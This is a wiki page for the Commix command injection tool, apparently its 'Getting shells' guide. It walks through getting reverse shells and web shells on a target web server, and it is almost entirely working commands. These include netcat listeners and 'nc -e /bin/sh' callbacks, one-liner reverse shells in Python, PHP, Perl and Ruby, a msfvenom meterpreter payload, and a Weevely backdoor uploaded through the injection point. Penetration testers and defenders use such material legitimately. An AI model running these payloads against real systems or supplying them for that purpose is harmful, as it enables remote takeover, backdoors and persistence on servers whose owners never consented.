-
-
Notifications
You must be signed in to change notification settings - Fork 875
Getting shells
This guide covers practical usage of reverse shells and web shells with Commix, a popular automated command injection exploitation tool. It includes multiple reverse shell techniques (Netcat-based and alternatives) and uploading/executing PHP-based web shells.
A reverse shell allows you to gain interactive shell access on a remote host by having that host connect back to your local machine.
Overview:
Netcat is a versatile networking utility, often referred to as the "Swiss-army knife" for TCP/IP. This method uses netcat on both attacker and victim to establish a reverse shell.
On your attacking machine, start netcat in listening mode on the chosen port (e.g., 1234):
nc -lvp 1234Output example:
listening on [any] 1234 ...
Run commix with the --os-cmd option to launch netcat on the target, connecting back to your machine:
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="nc -e /bin/sh YOUR_IP 1234"Alternatively, depending on the netcat binary present on the target:
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="/bin/nc.traditional -e /bin/sh YOUR_IP 1234"Commix offers an interactive shell option for reverse TCP shells:
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1"Once inside the commix shell:
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST YOUR_IP
commix(reverse_tcp) > set LPORT 1234
commix(reverse_tcp) > 1 # Choose Netcat reverse TCP shell
commix(reverse_tcp_netcat) > 3 # Choose Netcat-Traditional on target host
Your listener terminal will show the connection:
nc -lvp 1234Output:
connect to [YOUR_IP] from TARGET_IP 36746
whoami
www-data
Sometimes, netcat is not available on the target system. Use alternative reverse shell payloads written in scripting languages like Python, PHP, Perl, or Ruby.
These payloads initiate a reverse shell back to your machine without needing netcat.
Start netcat listening on your local machine as before:
nc -lvp 1234Replace YOUR_IP and 1234 accordingly.
Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'PHP reverse shell:
php -r '$sock=fsockopen("YOUR_IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");'Perl reverse shell:
perl -e 'use Socket;$i="YOUR_IP";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Ruby reverse shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR_IP",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'Example for Python reverse shell:
python commix.py --url="http://TARGET_IP/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"On your local listener terminal:
nc -lvp 1234Expected output:
connect to [YOUR_IP] from TARGET_IP 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Web shells allow interactive command execution or file management via a web server, usually by uploading or creating a malicious script on the target.
msfvenom -p php/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.phpNote: Add PHP tags manually to the file if not included:
<?php
// Payload code here
?>Open msfconsole and run:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
exploit
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"Once the payload executes, Metasploit will open a session:
meterpreter > sysinfo
Computer : target-hostname
OS : Linux ...
Meterpreter : php/php
weevely generate commixOutput:
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"Access Weevely interface:
weevely http://TARGET_IP/cmd/weevely.php commixExample session output:
www-data@target:/var/www/html/cmd$ ls -la
total 16
-rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php
- Replace
YOUR_IPandTARGET_IPwith appropriate attacker and target IP addresses. - Choose the reverse shell method based on the environment and available binaries on the target.
- Use netcat where possible for simplicity; fallback to scripting languages if netcat is missing.
- Always validate your payload syntax for correct escaping and quoting.
- Use Metasploit or Weevely for advanced post-exploitation and persistence.
- Ensure your listener port is open and not blocked by firewalls.
- Respect legal and ethical guidelines when performing penetration testing.
At the right side panel, you can find detailed information about Commix Project.
- Usage - Exhaustive breakdown of all options and switches together with examples
- Techniques - Techniques supported by commix
- Download and update - Keep it up-to-date
- Module development - Comprehensive guide for extending commix by developing custom modules
- Third party libraries - Breakdown of third-party components utilized in commix
- License - Copyright information
- Usage examples - Real-world examples of using commix across vulnerable applications
- Filters bypass examples - Payloads and techniques used to evade input filters
- Getting shells - Examples of using commix to gain shell
- Presentations - Conference talks, demos, and public presentations where commix has been featured or discussed.
- Screenshots - Visual examples of commix in action
- Third party references - References to commix in books, articles, research papers, blog posts, etc
- Command injection testbeds - A curated list of intentionally vulnerable web applications and platforms for safely testing commix